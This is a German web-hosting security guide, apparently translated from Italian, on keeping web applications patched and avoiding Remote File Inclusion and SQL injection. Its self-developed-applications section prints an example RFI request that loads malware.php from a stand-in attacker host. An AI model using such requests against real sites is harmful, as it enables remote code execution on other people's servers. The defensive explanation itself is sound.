Die Sicherheit von den Veröffentlichten Web-Anwendungen

Um in keinen Sicherheits-Schwierigkeiten auf die Seiten der eigenen Website zu stoßen, ist es absolut notwendig die veröffentlichte Web-Anwendungen sicher zu halten.

Es ist nämlich möglich, dass diejenigen Seiten dessen Code nicht auf sichererer Weise geschrieben wurde, von etlichen Attacken, unterdessen XSS oder SQL injection verwundbar sein könnten.

Diese Art von Schwachpunkten hängen nicht von der Sicherheit des Webservers ab, da sie mit gewöhnlichen http Anfragen  benutzt werden, die eigens erstellt wurden um den Code der Webseiten auf betrügerische weise zu missbrauchen.

Die Prozeduren die regelmäßig durchgeführt werden sollen, um diese Art von Schwierigkeiten zu verhindern, unterscheiden sich je nachdem man eine Webanwendung benutzt die von dritten oder eigenhändig entwickelt  wurde.

 

VON DRITTEN ENTWICKELTE ANWENDUNGEN

Um die eigene Website zu veröffentlichen, ist es möglich, im Netz, eine Vielzahl an Fertig-Anwendungen in verschiedenen Sprachen und von unterschiedlichen Datenbanken unterstützt, ausfindig zu machen.

Diese Anwendungsarten enthalten Forum, E-Commerce, Webmail, Guestbook und vieles weiteres mehr.

All diese Anwendungen können Schwachpunkte darstellen, die von jeden Übelwollenden in seinem Sinne genutzt werden können.

Um diese Art von Schwierigkeiten verhindern zu können, ist es notwendig regelmäßig die Anwesenheit von aktualisierten Versionen von den benutzten Anwendungen nachzuprüfen; im Regelfall sind Aktualisierungen direkt auf der Homepage des Entwicklers verfügbar.

Leider ist eine aktualisierte Anwendung in ihrer neusten Version nicht immer Sicher, um mehr Auskünfte über die meist verbreiteten Schwachstellen der Anwendungen einsehen zu können, sind zwei ausgezeichnete Webseiten verfügbar:


http://www.securityfocus.com/vulnerabilities
http://secunia.com/search/

Im Fall, dass eine Anwendung die man gerade benutzt, sich als nicht sicher erweisen sollte, raten wir Ihnen dessen Nutzung sofort zu unterbrechen, oder eine ähnliche Anwendung aussuchen, die aber von keiner Schwachstelle belastet ist.

Eine Kontrolle der verfügbaren Aktualisierungen für die benutzten Anwendungen, sollte regelmäßig durchgeführt werden. Um tatsächlich wirksam zu sein, sollte diese Prozedur mindestens einmal im Monat wiederholt werden.

Falls die benutzte Anwendung endgültig nicht mehr unterstützt werden sollte,  ist es ratsam so schnell wie möglich auf einer anderen Anwendung der gleichen Art und der noch aktiv unterstützt sei, umzuwechseln.

 

SELBSTENTWICKELTE ANWENDUNGEN

 

Das wichtigste an den selbst-entwickelten Anwendungen ist, dass sie so entwickelt werden sollen, dass sie wenigstens nicht von RFI (Remote File Inclusion) gefährdet werden können, diese Technik ermöglicht via URL den Inhalt einer von der geladene unterschiedliche Seite aufrufen, und empfindliche Informationen über eure Website zu visualisieren.

 

In der Regel wird diese Art von Schwachstelle, mit HTTP Anfragen wie folgenden, ausgenützt:

http://www.nomedominio.com/index.php?agina=http://www.sitomalevolo.com/malware.php?

Wo index.php die eigene Webseite ist die die Sicherheitslücke enthält und malware.php dagegen eine Seite mit böswilligen Code, die auf einem externen Server veröffentlicht ist.

Dank diese Anfragen wird die Ausführung des fernen Böswilligen Code auf dem Server wo die eigene Domain haust, versucht.

Es ist auch sehr wichtig SQLInjection ( Einschleusung von unerwünschten  Sql Queries) auf der eigenen Mysql-Mssql Datenbank, zu vermeiden.

Die Beschreibung dieser Art von Sicherheitslücken kann man auf der Seite http://it.wikipedia.org/wiki/SQL_injection finden.

Im Netzt sind zahlreiche Anleitungen für das Schreiben eines sicheren Code in den verschiedenen Programmierungssprachen verfügbar.